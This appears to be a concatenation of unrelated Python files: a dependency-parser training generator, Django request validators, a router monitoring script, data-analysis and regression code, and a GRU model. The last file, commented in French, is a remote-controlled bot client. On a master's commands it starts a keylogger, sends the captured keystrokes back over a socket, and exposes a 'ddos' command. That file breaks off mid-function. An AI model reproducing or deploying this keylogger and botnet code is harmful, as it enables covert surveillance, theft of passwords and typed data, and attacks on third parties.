if a.transition != T.SWAP and a.transition not in transitions
]
if selected_wrong_actions:
wrong_action = choice(selected_wrong_actions)
actions.append(("wrong", wrong_action))
shuffle(actions)
for i, (source, action) in enumerate(actions):
if len(actions) == 1 or i == len(actions) - 1:
# If this the only / last action, reuse the existing
# configuration to avoid the deepcopy overhead.
new_config = configuration
else:
new_config = Configuration(
deepcopy(configuration.sentence),
None,
None,
False,
configuration.device,
)
new_config.buffer = deepcopy(configuration.buffer)
new_config.stack = deepcopy(configuration.stack)
new_config.update_dynamic_oracle(action, shift_case)
new_config.apply_transition(action)
gold_transition, gold_relation = self._get_gold_labels(action)
if source == "valid":
wrong_transitions_tensor, wrong_relations_tensor = self._get_all_labels(
wrong_actions
)
yield ConfigurationItem(
sentence=self._get_sentence_tensor(new_config.sentence),
stack=stack,
buffer=buffer,
gold_transition=gold_transition,
gold_relation=gold_relation,
wrong_transitions=wrong_transitions_tensor,
wrong_relations=wrong_relations_tensor,
)
for configuration_item in self._generate_next_datapoint(new_config):
yield configuration_item
@staticmethod
def _remove_label_duplicates(actions):
seen_transitions = set()
filtered_actions = []
for action in actions:
if action.transition not in seen_transitions:
seen_transitions.add(action.transition)
filtered_actions.append(action)
return filtered_actions
@staticmethod
def _select_actions(actions):
probabilities = [1.0, 0.4, 0.1]
filtered_actions = []
for probability in probabilities:
if random() <= probability:
other_actions = [
action for action in actions if action not in filtered_actions
]
if not other_actions:
break
filtered_actions.append(choice(other_actions))
return filtered_actions
def _get_sentence_tensor(self, sentence):
tokens = []
for token in sentence:
token_id = self.vocabulary.add(token.form)
frequency = self.vocabulary.get_count(token.form)
if self.oov_probability:
if random() > (frequency + (frequency / self.oov_probability)):
token_id = self.vocabulary.oov
if random() < self.token_dropout:
token_id = self.vocabulary.oov
tokens.append(token_id)
return torch.tensor(tokens, dtype=torch.int64, device=self.device)
def _get_gold_labels(self, action):
relation_id = self.relations.label_signature.get_id(action.get_relation_object())
return (
torch.tensor(action.transition.value, dtype=torch.int64, device=self.device),
torch.tensor(relation_id, dtype=torch.int64, device=self.device),
)
def _get_all_labels(self, actions):
transitions = []
relations = []
for action in actions:
relation_id = self.relations.label_signature.get_id(
action.get_relation_object()
)
transition_id = action.transition.value
relations.append(relation_id)
transitions.append(transition_id)
return (
torch.tensor(transitions, dtype=torch.int64, device=self.device),
torch.tensor(relations, dtype=torch.int64, device=self.device),
)
@staticmethod
def _get_possible_action(configuration):
if configuration.left_arc_conditions:
yield Action(
relation=configuration.top_stack_token.relation,
transition=T.LEFT_ARC,
score=1.0,
np_score=1.0,
)
if configuration.right_arc_conditions:
yield Action(
relation=configuration.top_stack_token.relation,
transition=T.RIGHT_ARC,
score=1.0,
np_score=1.0,
)
if configuration.shift_conditions:
yield Action(relation=None, transition=T.SHIFT, score=1.0, np_score=1.0)
if configuration.swap_conditions:
yield Action(relation=None, transition=T.SWAP, score=1.0, np_score=1.0)
|
"""
If you are trying to understand how to use the API, this is the wrong file.
This file contains generic request validation which applies to broad categories
of requests, e.g. requests from teachers, or requests from students
This stuff exists just so we don't have to type it over and over
"""
from django.http import HttpResponseBadRequest, HttpResponseForbidden, HttpResponseServerError, HttpResponseNotAllowed
from seat.models.teacher import Teacher
from seat.models.student import Student
import logging
logger = logging.getLogger('api')
ID_MAX = 214748364
def get_dict_by_method(request, method):
if method == "POST": return request.POST
if method == "GET": return request.GET
if method == "DELETE": return request.DELETE
if method == "PUT": return request.PUT
def id_is_valid(id):
return (id is not None and str(id).strip() != '' and int(id) < ID_MAX)
def key_is_substring_of_some_dict_key(key, dictionary):
for dict_key in dictionary.keys():
if dict_key.find(key) >= 0:
return True
return False
def all_required_values_present(values, request, method):
dictionary = get_dict_by_method(request, method)
for key in values:
if not key_is_substring_of_some_dict_key(key, dictionary):
return False
return True
def standard_student_endpoint(
endpoint_name,
required_values,
method,
request,
functor):
"""
# @required_values = array of necessary values for the endpoint to function
# @method = POST, PUT, GET, DELETE
# @request = request object from django
#
# @functor = function that actually does the
# specific logic for this endpoint;
# takes (student_query, request) as params
"""
try:
# verify method
if request.method != method:
logger.warn("non-"+method+" request landed in "+method+" logic at "+endpoint_name+" in the api")
return HttpResponseBadRequest("bummer. your non-"+method+" request landed in the "+method+" logic.")
# very if potentially authorized
# user_id is only placed in the session by us
# when the user logs into the application
if 'user_id' not in request.session:
logger.debug("unauthenticated request to "+endpoint_name)
return HttpResponseForbidden('not authenticated')
user_id = request.session.get('user_id')
# verify the user id is regular
if not id_is_valid(user_id):
logger.debug("invalid id in request to"+endpoint_name)
return HttpResponseBadRequest("Invalid ID")
# verify each of the desired parameters is present in the method body
if not all_required_values_present(required_values, request, method):
logger.info("bad request made to "+endpoint_name+", not enough params "+str(request))
return HttpResponseBadRequest("expected more values, expected these:"+str(required_values))
# get the query for the student
student_query = Student.objects.filter(id=user_id)
# verify that this requesting user actually exists
if not student_query.exists():
logger.info("user who was not a student made a request to "+endpoint_name+", id of user:"+str(request.session['user_id']))
return HttpResponseNotAllowed('not authorized')
# endpoint specific logic
return functor(student_query, request)
except Exception, error:
logger.info("error in api endpoint "+endpoint_name+":"+str(error))
return HttpResponseServerError("unhandled error")
def standard_teacher_endpoint(
endpoint_name,
required_values,
method,
request,
functor):
"""
# @required_values = array of necessary values for the endpoint to function
# @method = POST, PUT, GET, DELETE
# @request = request object from django
#
# @functor = function that actually does the
# specific logic for this endpoint;
# takes (teacher_query, request) as params
"""
try:
# validate we are receiving expected method
if request.method != method:
logger.warn("non-"+method+" request landed in "+method+" logic at "+endpoint_name+" in the api:"+str(request))
return HttpResponseBadRequest("bummer. your non-"+method+" request landed in the "+method+" logic.")
# validate that the user may be authorized to
# perform this action - we set the user_id in the
# session at login
if 'user_id' not in request.session:
logger.debug("unauthenticated request to "+endpoint_name)
return HttpResponseForbidden('not authenticated')
teacher_id = request.session.get('user_id')
# check that the id is valid for usage
if not id_is_valid(teacher_id):
return HttpResponseBadRequest("invalid id")
# get the query for this teacher
teacher_query = Teacher.objects.filter(id=teacher_id)
# validate that there is some teacher with this id
if not teacher_query.exists():
logger.info("user who was not a teacher made a request to "+endpoint_name+", id of user:"+str(teacher_id))
return HttpResponseForbidden('not a teacher!')
# validate that all desired parameters are present in the request body
if not all_required_values_present(required_values, request, method):
logger.info("bad request made to "+endpoint_name+", not enough params ")
return HttpResponseBadRequest("expected more values, expected these:"+str(required_values))
# perform the endpoint specific logic
return functor(teacher_query, request)
except Exception, error:
logger.info("error in api endpoint "+endpoint_name+":"+str(error))
return HttpResponseServerError("unhandled error?!")
|
import httplib
import sys
import os
import time
import subprocess
import json
from subprocess import check_output
import pprint
process_name= "sudo /usr/local/bin/nfd" # change this to the name of your process
filename="/root/nfd_conf"
notNotied=True
while True:
tmp = os.popen("ps -Af").read()
if process_name not in tmp[:]:
print "The process is not running. Let's restart."
newprocess="nfd-start &> /var/log/nfd_log"
os.system(newprocess)
else:
print "The process is running."
line = subprocess.check_output(['tail', '-1', filename])
print(line)
new_config=json.loads(str(line))
if (new_config.get("container_down","null")!="null" and notNotied):
notNotied=True
conn = httplib.HTTPConnection(sys.argv[1], sys.argv[2], timeout=5)
header = {}
# there is data to send
if new_config is not None:
# encode it in json format
data = json.dumps(new_config)
header['Content-Type'] = 'application/json'
# send the request and get the response
conn.request('POST','/router/notifications/finish_scale_out',data,header)
res = conn.getresponse()
print(str(res.status))
new_rules={}
if (len(new_config["to_add"])>0):
new_rules=new_config["to_add"]
out = check_output('nfd-status')
faceid_list = [face for face in out.split('\n') if ("remote=tcp" in face)]
face_olds={}
ip_olds={}
for face_old in faceid_list:
values = [value for value in face_old.split(' ') if value != '']
faceid=values[0].split('faceid=')[1]
if values[1].split('=')[0] == 'remote':
remote_face = values[1].split('://')[1]
face_olds[remote_face]=faceid
ip_olds[remote_face.split(':')[0]]=faceid
for f_o in face_olds:
print(f_o)
prefix_list = [face for face in out.split('\n') if ("nexthops" in face)]
prefix_ids={}
for p in prefix_list:
values = [value for value in p.split(' nexthops=') if value != '']
prefix=values[0].split(' ')[2]
faces_v=values[1].split(',')
prefix_ids[prefix]=[]
for f in faces_v:
prefix_ids[prefix].append(f.split('faceid=')[1].split(' ')[0])
pprint.pprint(prefix_ids)
for key, face_list in new_rules.iteritems():
prefix =key
#print(prefix_ids[prefix])
for face in face_list:
if face.split(":")[0] in ip_olds.keys():
print("face 1 :"+face)
#for i in range(0):
if (face in face_olds.keys()):
print(face)
if (face_olds[str(face)] not in prefix_ids[prefix]):
print(face)
interface = " tcp://"+face
str_command = "nfdc register "+prefix+interface
ping_command = "ping -c 5 "+face.split(':')[0]
subprocess.call(args=ping_command, shell=True)
subprocess.call(args=str_command, shell=True)
else:
for face_o in face_olds.keys():
print(face_o)
if face_o.split(":")[0]==face.split(":")[0]:
un_str_command = "nfdc unregister "+prefix+" tcp://"+face_o
subprocess.call(args=un_str_command, shell=True)
interface = " tcp://"+face
str_command = "nfdc register "+prefix+interface
ping_command = "ping -c 5 "+face.split(':')[0]
subprocess.call(args=ping_command, shell=True)
subprocess.call(args=str_command, shell=True)
else:
interface = " tcp://"+face
str_command = "nfdc register "+prefix+interface
ping_command = "ping -c 5 "+face.split(':')[0]
subprocess.call(args=ping_command, shell=True)
subprocess.call(args=str_command, shell=True)
time.sleep(2)
if (len(new_config["strategy"])>0):
if (new_config["strategy"]=="round"):
strategy_command = "nfdc strategy set {0} /localhost/nfd/strategy/round-robin/%FD%01".format(prefix)
subprocess.call(args=strategy_command, shell=True)
time.sleep(1)
|
import pandas as pd
import os
# Se define el directorio de resultados
directory = 'Results3/'
# Se genera la lista con todos los archivos
files = [f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
# Ciclo que itera sobre todos los archivos
csv1 = 'instance, mean iterations, sd iterations, mean bins, sd bins, mean score, sd score, mean neighbors, sd neighbors, mean time, sd time \n'
csv2 = 'instance, mean, min, max, q1, q2, q3 \n'
csv3 = 'instance, best score, best bins, optimal solution, difference \n'
optimal = pd.read_csv('../Instances/optimalSolutions.csv')
for f in files:
print(f)
df = pd.read_csv(directory+f,header=None,encoding="unicode_escape")
df = df.iloc[1:]
df = df.reset_index(drop=True)
convert_dict = {0: int,
1: int,
2: float,
3: str,
4: str,
5: str,
6: int,
7: float}
df = df.astype(convert_dict)
csv1 += f.replace('.csv','')+', '+'{:.3f}'.format(df[0].mean())+', '+'{:.3f}'.format(df[0].std())+', '+'{:.3f}'.format(df[1].mean())+', '+'{:.3f}'.format(df[1].std())+', '+'{:.3f}'.format(df[2].mean())+', '+'{:.3f}'.format(df[2].std())+', '+'{:.3f}'.format(df[6].mean())+', '+'{:.3f}'.format(df[6].std())+', '+'{:.3f}'.format(df[7].mean())+', '+'{:.3f}'.format(df[7].std())+'\n'
csv2 += f.replace('.csv','')+', '+'{:.3f}'.format(df[2].mean())+', '+'{:.3f}'.format(df[2].min())+', '+'{:.3f}'.format(df[2].max())+', '+'{:.3f}'.format(df[2].quantile(0.25))+', '+'{:.3f}'.format(df[2].quantile(0.5))+', '+'{:.3f}'.format(df[2].quantile(0.75))+'\n'
ind = df[2].idxmax(axis=1)
ind2 = optimal.index[optimal['Instance']==f.replace('.csv','')][0]
csv3 += f.replace('.csv','')+', '+'{:.3f}'.format(df[2].iloc[ind])+', '+'{:.3f}'.format(df[1].iloc[ind])+', '+'{:.3f}'.format(optimal['Optimal'].iloc[ind2])+', '+'{:.3f}'.format(df[1].iloc[ind]-optimal['Optimal'].iloc[ind2])+'\n'
file = open('Results3/Summary/Statistics.csv', 'w')
file.writelines(csv1)
file.close()
file = open('Results3/Summary/ScoreDistribution.csv', 'w')
file.writelines(csv2)
file.close()
file = open('Results3/Summary/BestSolutions.csv', 'w')
file.writelines(csv3)
file.close()
|
def bs(a, l, r, v):
mid = l + (r - l)//2
if l > r:
return -1
if a[mid] == v:
return mid
idx = 0
if v > a[mid]:
idx = bs(a, mid + 1, r, v)
if v < a[mid]:
idx = bs(a, l, mid - 1, v)
return idx
n = int(input())
soma = 0
a = []
for i in input().split():
j = int(i)
a.append(j)
soma += j
c = [x for x in a]
a.sort()
j = []
num = 0
for i in range(0, len(a)):
b = a[0:i] + a[i+1:len(a)]
idx = bs(b, 0, len(a) - 2, (soma - a[i])//2)
if idx != -1 and b[idx]*2 == (soma - a[i]):
idx2 = [k for k, val in enumerate(c) if val == a[i]]
if j.__contains__(idx2) == False:
j.append(idx2)
for i in j:
num += len(i)
print(num)
for i in j:
for k in range(0, len(i)):
if i == j[len(j) - 1] and k == len(i) - 1:
print(i[k] + 1, end='')
else:
print(i[k] + 1, end=' ')
print()
|
# Import libraries
from PIL import Image
import pytesseract
import sys
from pdf2image import convert_from_path
import os
from PyPDF2 import PdfFileReader, PdfFileWriter
def pdf_splitter(path):
f = open(outfile, "a")
pdf = open(path, "rb").read()
startmark = b"\xff\xd8"
startfix = 0
endmark = b"\xff\xd9"
endfix = 2
i = 0
njpg = 0
while True:
istream = pdf.find(b"stream", i)
if istream < 0:
break
istart = pdf.find(startmark, istream, istream+20)
if istart < 0:
i = istream+20
continue
iend = pdf.find(b"endstream", istart)
if iend < 0:
raise Exception("Didn't find end of stream!")
iend = pdf.find(endmark, iend-20)
if iend < 0:
raise Exception("Didn't find end of JPG!")
istart += startfix
iend += endfix
print("JPG ",njpg," from ",istart," to ",iend)
jpg = pdf[istart:iend]
jpgname='jpg'+str(njpg)+'.jpg'
jpgfile = open("jpg%d.jpg" % njpg, "wb")
jpgfile.write(jpg)
jpgfile.close()
njpg += 1
i = iend
# Path of the pdf
PDF_file = sys.argv[1]
'''
Part #1 : Converting PDF to images
'''
# Store all the pages of the PDF in a variable
pages = convert_from_path(PDF_file, 500)
# Counter to store images of each page of PDF to image
image_counter = 1
# Iterate through all the pages stored above
for page in pages:
filename = PDF_file+"page_"+str(image_counter)+".jpg"
# Save the image of the page in system
page.save(filename, 'JPEG')
# Increment the counter to update filename
image_counter = image_counter + 1
if(os.stat(filename).st_size == 0):
pdf_splitter(PDF_file)
|
# Author: Ziga Trojer, zt0006@student.uni-lj.si
import pandas as pd
import numpy as np
import math
import scipy
from scipy import optimize
from sklearn.preprocessing import StandardScaler
import random
import scipy.stats as st
def p_object_j_observation_i(current_class, X, B):
"""
:param current_class: chosen class
:param X: input data
:param B: matrix of weights
:return: probabilities for class current_class
"""
denominator = 0
for c in range(len(classes) - 1):
denominator += pow(math.e, np.dot(B[c, 1:], np.transpose(X)) + B[c, :1])
if current_class < len(classes) - 1:
return pow(math.e, np.dot(B[current_class, 1:], np.transpose(X)) + B[current_class, :1]) / (1 + denominator)
else:
return 1 / (1 + denominator)
def softmax(X, B):
"""
:param X: input data
:param B: matrix of weight
:return: softmax array of size (number of data points) x (number of classes)
"""
softmax_array = np.zeros((X.shape[0], B.shape[0] + 1))
for c in range(len(classes)):
softmax_array[:, c] = np.array(p_object_j_observation_i(c, X, B))[:]
return softmax_array
def log_likelihood(B, X, y, shape):
"""
:param B: matrix of weights
:param X: input data
:param y: input response
:param shape: shape of B
:return: log-likelihood
"""
B = np.reshape(B, shape)
temp_likelihood = 0
softmax_vector = softmax(X, B)
softmax_vector_log = np.log(softmax_vector)
for k in range(len(y)):
true_class = y[k]
temp_likelihood += softmax_vector_log[k, true_class]
return -temp_likelihood
def standard_logistic_distribution(x):
"""
:param x: x
:return: value between 0 and 1
"""
return 1/2 + 1/2 * np.tanh(x/2)
def ordinal_probabilities(X, W, T):
"""
:param X: input data
:param W: vector of weights
:param T: vector of boundaries
:return: probabilities for ordinal logistic regression
"""
u = np.zeros((X.shape[0], 1))
p = np.zeros((X.shape[0], len(T)-1))
for i in range(X.shape[0]):
u[i] = np.dot(W[1:], X[i]) + W[0]
for j in range(0, len(T)-1):
p[i, j] = standard_logistic_distribution(T[j+1]-u[i][0]) - standard_logistic_distribution(T[j]-u[i][0])
return p
def log_likelihood_ordinal(weights_W_T, X, y):
"""
:param weights_W_T: combined weights and boundaries
:param X: input data
:param y: input response
:return: log_likelihood value
"""
bound = X.shape[1]
W = weights_W_T[:bound+1]
diff = weights_W_T[bound+1:]
temp_likelihood = 0
T = np.zeros((len(set(y))))
T[0] = -np.Inf
T = np.append(T, np.Inf)
for k in range(2, len(T)-1):
T[k] = T[k - 1] + diff[k - 1]
probab = ordinal_probabilities(X, W, T)
for k in range(len(y)):
true_class = y[k]
temp_likelihood += math.log(probab[k, true_class])
return -temp_likelihood
def get_accuracy(predictions, real_values):
"""
:param predictions: vector of predictions
:param real_values: true values
:return: accuracy
"""
acc = 0
for first, second in zip(predictions, real_values):
if first == second:
acc += 1
return acc / len(predictions)
class ModelMultinomial:
def __init__(self):
self.weights = None
def update_weights(self, new_weights):
"""
:param new_weights: array of new weights
"""
self.weights = new_weights
def predict(self, X):
"""
:param X: input data
:return: vector of predictions
"""
predicted_class = list()
probabilities = softmax(X, self.weights)
prediction_len = len(probabilities)
for k in range(prediction_len):
pred = list(probabilities[k]).index(max(list(probabilities[k])))
predicted_class.append(pred)
return predicted_class
def log_loss(self, X, y):
"""
:param X: input data
:param y: true values
:return: log-loss value
"""
log_loss_value = 0
probabilities = softmax(X, self.weights)
for i in range(len(y)):
true_class = y[i]
prob = probabilities[i, true_class]
log_loss_value += math.log(prob)
return - log_loss_value / len(y)
class ModelLogistic:
def __init__(self):
self.weights = None
self.boundary = None
def update_weights(self, new_weights):
"""
:param new_weights: vector of new weights
"""
self.weights = new_weights
def update_boundary(self, new_boundary):
"""
:param new_boundary: vector of new boundaries
"""
self.boundary = new_boundary
def predict(self, X):
"""
:param X: input data
:return: vector of predictions
"""
predicted_class = list()
probabilities = ordinal_probabilities(X, self.weights, self.boundary)
prediction_len = len(probabilities)
for k in range(prediction_len):
pred = list(probabilities[k]).index(max(list(probabilities[k])))
predicted_class.append(pred)
return predicted_class
def log_loss(self, X, y):
"""
:param X: input data
:param y: true values
:return: log-loss value
"""
log_loss_value = 0
probabilities = ordinal_probabilities(X, self.weights, self.boundary)
for i in range(len(y)):
true_class = y[i]
prob = probabilities[i, true_class]
log_loss_value += math.log(prob)
return - log_loss_value / len(y)
class MultinomialLogReg:
def __init__(self):
self.initial_size = 2
def build(self, X, y):
"""
:param X: input data
:param y: input response
:return: model as an object ModelMultinomial
"""
model = ModelMultinomial()
shape = (len(list(set(y))) - 1, X.shape[1]+1)
initial_guess = np.ones(shape) / self.initial_size
c = scipy.optimize.fmin_l_bfgs_b(log_likelihood, x0=initial_guess, args=[X, y, shape], approx_grad=True)
model.update_weights(c[0].reshape(shape))
if c[2]['warnflag'] == 0:
print('Optimization algorithm converged. Multinomial Logistic Regression successfully fitted!')
elif c[2]['warnflag']:
print('Too many function evaluations or too many iterations!')
else:
print(f"Stopped for the reason: {c[2]['task']}")
return model
class OrdinalLogReg:
def __init__(self):
self.initial_size = 15
def build(self, X, y):
"""
:param X: input data
:param y: input response
:return: model as an object ModelLogistic
"""
model = ModelLogistic()
shape_diff = (1, len(set(y))-1)
shape = (1, X.shape[1]+1)
initial_guess = np.ones(shape) / self.initial_size
initial_guess = np.append(initial_guess, np.full(shape_diff, 1e-10))
bounds = [(None, None)] * shape[1]
bounds += [(1e-10, None)] * shape_diff[1]
c = scipy.optimize.fmin_l_bfgs_b(log_likelihood_ordinal,
x0=initial_guess,
args=[X, y],
bounds=bounds,
approx_grad=True)
model.update_weights(c[0][:shape[1]])
# write coefficients into csv
print(c[0])
write = False
if write:
keys = ['intersection', 'age', 'sex', 'year', 'X1', 'X2', 'X3', 'X4', 'X5', 'X6', 'X7', 'X8', 'delta1', 'delta2', 'delta3']
values = c[0]
res = {keys[i]: values[i] for i in range(len(keys))}
df = pd.DataFrame(res, index=[0])
df.to_csv('weights_logistic.csv', index=False)
if c[2]['warnflag'] == 0:
print('Optimization algorithm converged. Ordinal Logistic Regression successfully fitted!')
elif c[2]['warnflag']:
print('Too many function evaluations or too many iterations!')
else:
print(f"Stopped for the reason: {c[2]['task']}")
T = np.zeros((len(set(y))))
T[0] = -np.Inf
T = np.append(T, np.Inf)
for k in range(2, len(T)-1):
T[k] = T[k-1] + c[0][shape[1]+k-1]
model.update_boundary(T)
print(T)
return model
def split_index(x_data, k):
"""Splits data into k folds"""
folds = list()
indexes = list(range(len(x_data)))
for j in range(k):
fold = random.Random(42).sample(indexes, round(len(x_data) / k))
folds.append(fold)
for element in fold:
indexes.remove(element)
return folds, list(range(len(x_data)))
def get_cross_validation_data(x_data, y_data, k):
"""Returns training and testing folds of x_data and y_data"""
train_x, train_y = list(), list()
test_x, test_y = list(), list()
indexes, all_index = split_index(x_data, k)
for test_index in indexes:
test_y.append(list(np.array(y_data)[test_index]))
test_x.append(x_data[test_index])
train_index = [i for i in all_index if i not in test_index]
train_x.append(x_data[train_index])
train_y.append(list(np.array(y_data)[train_index]))
return train_x, train_y, test_x, test_y
def naive_model_log_loss(y):
log_loss_value = 0
p = [0.15, 0.1, 0.05, 0.4, 0.3]
for t in range(len(y)):
log_loss_value += math.log(p[y[t]])
return -log_loss_value / len(y)
def scale_data(X):
scaler = StandardScaler()
scaler.fit(X)
return scaler.transform(X)
def log_loss_cv(X, y, k):
cross_train_x, cross_train_y, cross_test_x, cross_test_y = get_cross_validation_data(X, y, k)
multinomial_list = list()
ordinal_list = list()
naive_list = list()
for X, Y, Z, W in zip(cross_train_x, cross_train_y, cross_test_x, cross_test_y):
print('Next fold!')
X = scale_data(X)
Z = scale_data(Z)
multinomial_mdl = MultinomialLogReg()
multinomial_mdl_build = multinomial_mdl.build(X, Y)
multinomial_list.append(multinomial_mdl_build.log_loss(Z, W))
ordinal_mdl = OrdinalLogReg()
ordinal_mdl_build = ordinal_mdl.build(X, Y)
ordinal_list.append(ordinal_mdl_build.log_loss(Z, W))
naive_list.append(naive_model_log_loss(W))
multinomial_ci = st.t.interval(0.95, len(multinomial_list) - 1, np.mean(multinomial_list), st.sem(multinomial_list))
ordinal_ci = st.t.interval(0.95, len(ordinal_list) - 1, np.mean(ordinal_list), st.sem(ordinal_list))
naive_ci = st.t.interval(0.95, len(naive_list) - 1, np.mean(naive_list), st.sem(naive_list))
return multinomial_ci, np.mean(multinomial_list), ordinal_ci, np.mean(ordinal_list), naive_ci, np.mean(naive_list)
if __name__ == "__main__":
# load data
dataset = pd.read_csv('dataset.csv', sep=';')
# correlation = dataset.corr(method='pearson')
# correlation.to_csv('correlation.csv', index=False)
# separate to response
Y_data, X_data = dataset.response, dataset.iloc[:, 1:]
# define classes
classes_ordinal = Y_data.unique()
class_order = [4, 1, 5, 3, 2]
classes_ordinal = [x for _, x in sorted(zip(class_order, classes_ordinal))]
classes = [y-1 for y, _ in sorted(zip(class_order, classes_ordinal))]
d = dict([(y, x) for x, y in enumerate(classes_ordinal)])
# transform feature sex into is_female
sex_dict = {'M': 0, 'F': 1}
X_data.sex = X_data.sex.map(sex_dict)
new_Y = list(Y_data.map(d))
new_X = X_data.values
# set this value to True, if want to check CV
cross_valid = True
if cross_valid:
print(log_loss_cv(new_X, new_Y, 10))
new_X = scale_data(new_X)
test_own_dataset = False
if test_own_dataset:
dataset2_train = pd.read_csv('multinomial_bad_ordinal_good_train.csv', sep=',')
dataset2_test = pd.read_csv('multinomial_bad_ordinal_good_test.csv', sep=',')
Y_data_train, X_data_train = dataset2_train.variance, dataset2_train.iloc[:, 1:]
Y_data_test, X_data_test = dataset2_test.variance, dataset2_test.iloc[:, 1:]
X_data_train = X_data_train.values
X_data_test = X_data_test.values
classes_ordinal_test = Y_data_train.unique()
class_order_test = [3, 4, 2, 1]
classes = [x for _, x in sorted(zip(class_order_test, classes_ordinal_test))]
d_test = dict([(y, x) for x, y in enumerate(classes_ordinal_test)])
new_Y_train = list(Y_data_train.map(d_test))
new_Y_test = list(Y_data_test.map(d_test))
X_data_train = scale_data(X_data_train)
X_data_test = scale_data(X_data_test)
multinomial_model = MultinomialLogReg()
multinomial_model_build = multinomial_model.build(X_data_train, new_Y_train)
multinomial_model_predictions = multinomial_model_build.predict(X_data_test)
multinomial_loss = multinomial_model_build.log_loss(X_data_test, new_Y_test)
ordinal_model = OrdinalLogReg()
ordinal_model_build = ordinal_model.build(X_data_train, new_Y_train)
ordinal_model_predictions = ordinal_model_build.predict(X_data_test)
ordinal_loss = ordinal_model_build.log_loss(X_data_test, new_Y_test)
print(f'Accuracy for multinomial logistic regression is '
f'{get_accuracy(multinomial_model_predictions, new_Y_test)}. 'f'Log-loss is: {multinomial_loss}')
print(f'Accuracy for ordinal logistic regression is '
f'{get_accuracy(ordinal_model_predictions, new_Y_test)}. 'f'Log-loss is: {ordinal_loss}')
|
from torch import nn
from params import *
class GRU(nn.Module):
def __init__(self):
super().__init__()
self.hidden_size = HIDDEN_SIZE
self.num_layers = NUM_LAYERS
self.gru = nn.GRU(input_size=INPUT_SIZE,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
bidirectional=BIDIRECTIONAL,
dropout=DROPOUT,
batch_first=True)
self.fc = nn.Linear(2 * self.hidden_size if BIDIRECTIONAL else self.hidden_size, OUTPUT_SIZE)
def init_state(self, batch_size: int) -> torch.Tensor:
return torch.zeros(2 * self.num_layers if BIDIRECTIONAL else self.num_layers, batch_size, self.hidden_size)
def forward(self, x: torch.Tensor, h: torch.Tensor) -> torch.Tensor:
"""
@param x: input sequence of shape [batch_size, sequence_length, num_features]
@param h: hidden state of shape [num_layers (2x if bidirectional), batch_size, hidden_size]
"""
o, _ = self.gru(x, h)
return self.fc(o)[:, -1, :]
|
#importation du module socket afin de permetttre une communication réseau
import socket as modSocket
from pynput.keyboard import Key, Listener
import logging
import threading
import time
from datetime import datetime
from pythonping import ping
lock = threading.Lock()
"""
creation de l'objet Connexion, composé de 4 champs et 3 méthodes
1ère methode : elle va permettre d'écouter sur un port donné et une adresse, une fois els connexion acceptée elle recevra en continu
dans une boucle while les messages envoyé par le maitre, selon le message reçu le slave lancera une méthode présentes dans
l'interface Action.
2ème methode : va re-ecouter si jamais un problème a été signalé plutôt dans le code, elle va juste fermer la carte reseau, elle re lancer.
3ème methode : ces celle qui va se lancer en premier, elle va se connecter à une machine distante en lui envoyant un message. et va finir
en lançant la première méthode
"""
class Connexion():
# création de l'objet connexion avec le champ adresseMachine
def __init__(self, adresseMachine, carteReseauEcoute, carteReseauConn, donnee):
self.adresseMachine = adresseMachine
self.carteReseauEcoute = carteReseauEcoute
self.carteReseauConn = carteReseauConn
self.donnee = donnee
#1er étape, mettre en place un canal de communication pour recevoir les messages du master
def listen(self, carteReseauEcoute, donnee):
# écoute sur toutes l'adresse du slave et sur le port 60 000
adresseMachineMaitre = (("localhost", 60000))
carteReseauEcoute.bind(adresseMachineMaitre)
# une fois connecté, on le met en écoute et on accepte la connexion afin qu'il reçoive les instruction du master
print("J'écoute")
carteReseauEcoute.listen(5)
connReseau, addr = carteReseauEcoute.accept()
print("Connecté avec la machine : ", addr)
#boucle qui permet de lancer une methode de l'objet communication
try:
while donnee != "FIN":
if donnee == "keylogger":
print("OK je lance le keylogger")
#lance la methode start_log de l'objet Communication
threading.Thread(target=a.start_log, args=()).start()
elif donnee == "stop":
print("J'arrête le keylogger")
a.stop_log()
elif donnee == "transfert":
print("J'envoie le keylogger")
a.get_log(connReseau, donnee)
elif donnee == "ddos":
print("on lance le ddos")
a.ddos(connReseau)
donnee = connReseau.recv(1024).decode("utf-8")
except ConnectionResetError:
print("Connexion arreté par le maitre")
a.reEcoute(carteReseauEcoute)
a.reEcoute(carteReseauEcoute)
def reEcoute(self, carteReseauEcoute):
print("Fini je re-écoute")
carteReseauEcoute.close()
carteReseauEcoute = modSocket.socket(modSocket.AF_INET, modSocket.SOCK_STREAM)
a.listen(carteReseauEcoute, donnee)
# 2è étape, mettre en place un canal de communication pour envoyer des messages au master
def sendIP(self, carteReseauConn, adresseMachine):
try:
# on définit les coordonnées sur lesquelles le slave va envoyer son adresse ip
carteReseauConn.connect(adresseMachine)
carteReseauConn.send(b"Je me connecte")
print("IP envoyée au master")
a.listen(carteReseauEcoute, donnee)
except ConnectionRefusedError:
print("Machine maitre non connecté")
a.listen(carteReseauEcoute, donnee)
"""
creation de l'objet Action , qui va être enfant de l'objet Connexion, Il est composé
de 5 méthodes et d'un seul champ.
1ère methode et 2ème (start_log, appuie): Ces 2 méthodes vont permettre de lancer le keylogger, start_log va avoir besoin de la méthode
appuie pour fonctionner.
3ème methode (stop_log): va stopper le start_log
4ème methode (get_log): va aller chercher le fichier "keylogger.txt", le mettre à l'envers et prendre le nombre de ligne que veut le maitre,
puis va lui envoyer
5ème methode (ddos): tu avs peut être changer
"""
class Action(Connexion):
def __init__(self, donnee):
self.donnee = donnee
#assigne listener à la méthode appuie
self.listener = Listener(on_press=self.appuie)
def start_log(self):
try:
#chemin ou seront écris les logs voulus
log_dir = r"D:"
#met les informations de base concernant le logger
#filename, spécifie le nom du fichier
#format, impose les infos de base qui se trouveront dans le logger, içi la date avec l'heure puis les infos sur les entrées sur le clavier
logging.basicConfig(filename = (log_dir + "\\keyLog.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
#listener.start va commencer a écouter grace a la methode appuie qui est assigné à la varibale listener
self.listener.start()
except FileNotFoundError:
print("erreur chemin inexistant")
#Création d'une fonction appuie(), qui vas mettre en string touts les appuie sur le clavier
def appuie(self, key):
logging.info(str(key))
def stop_log(self):
#listener.start va arreter d'écouter en fermant la methode appuie qui est assigné à la varibale listener
self.listener.stop()
print("logger arreté")
def get_log(self, connReseau, donnee):
logger = open("D:\\keyLog.txt", "r")
#lis le fichier ligne à ligne
fichier = logger.readlines()
#boucle qui permet de compter le nombre de ligne
nb_lines = 0
for line in logger.readlines():
nb_lines+=1
#on reçoit le nombre de ligne que le maitre veut récuperer
lines = connReseau.recv(1024).decode("utf-8")
